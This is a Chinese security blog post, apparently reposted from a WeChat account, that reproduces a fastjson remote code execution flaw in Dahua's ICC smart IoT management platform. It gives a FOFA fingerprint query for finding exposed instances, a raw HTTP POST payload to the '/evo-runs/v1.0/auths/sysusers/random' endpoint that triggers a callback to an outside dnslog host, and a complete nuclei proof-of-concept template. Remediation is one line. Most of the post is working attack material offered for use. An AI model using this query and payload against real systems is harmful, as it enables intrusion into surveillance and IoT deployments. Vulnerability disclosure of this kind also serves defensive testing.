大华ICC智能物联综合管理平台random远程代码执行漏洞复现

admin 2024年5月31日10:01:47评论594 views字数 1692阅读5分38秒阅读模式
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

01—漏洞名称

大华ICC智能物联综合管理平台random远程代码执行漏洞

02—漏洞影响

大华ICC智能物联综合管理平台 版本不详

大华ICC智能物联综合管理平台random远程代码执行漏洞复现

03—漏洞描述

大华ICC智能物联综合管理平台是一个集成了物联网技术、大数据分析、云计算等先进技术的综合性管理平台。它致力于为企业提供一站式的物联网解决方案,帮助企业实现设备连接、数据收集、分析与应用,从而提高企业的运营效率、降低成本,并推动物联网行业的创新与发展。该系统random接口处存在fastjson远程代码执行漏洞。

04—FOFA搜索语句

icon_hash="-1935899595"

大华ICC智能物联综合管理平台random远程代码执行漏洞复现

05—漏洞复现

借助http://dnslog.pw/dns/进行复现,随机生成一个账号复制payload替换下面的farr9frh.dnslog.pw,向靶场发送如下数据包

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 161Accept-Encoding: gzipConnection: closeContent-Type: application/json;charset=utf-8{  "a":{    "@type":"com.alibaba.fastjson.JSONObject",    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}  }""}

大华ICC智能物联综合管理平台random远程代码执行漏洞复现

漏洞复现成功

06—nuclei poc

poc文件内容如下

id: dahua-icc-random-rceinfo:  name: 大华ICC智能物联综合管理平台random远程代码执行漏洞  author: fgz  severity: critical  description: 大华ICC智能物联综合管理平台是一个集成了物联网技术、大数据分析、云计算等先进技术的综合性管理平台。它致力于为企业提供一站式的物联网解决方案,帮助企业实现设备连接、数据收集、分析与应用,从而提高企业的运营效率、降低成本,并推动物联网行业的创新与发展。该系统random接口处存在fastjson远程代码执行漏洞。  metadata:    max-request: 1    fofa-query: icon_hash="-1935899595"    verified: truerequests:  - raw:      - |+        POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Content-Type: application/json;charset=utf-8        Accept-Encoding: gzip        Connection: close        {          "a":{            "@type":"com.alibaba.fastjson.JSONObject",            {"@type":"java.net.URL","val":"http://{{interactsh-url}}"}          }""        }    matchers:      - type: dsl        dsl:          - contains(interactsh_protocol, "dns")        condition: and
07—修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):大华ICC智能物联综合管理平台random远程代码执行漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月31日10:01:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大华ICC智能物联综合管理平台random远程代码执行漏洞复现https://cn-sec.com/archives/2798382.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息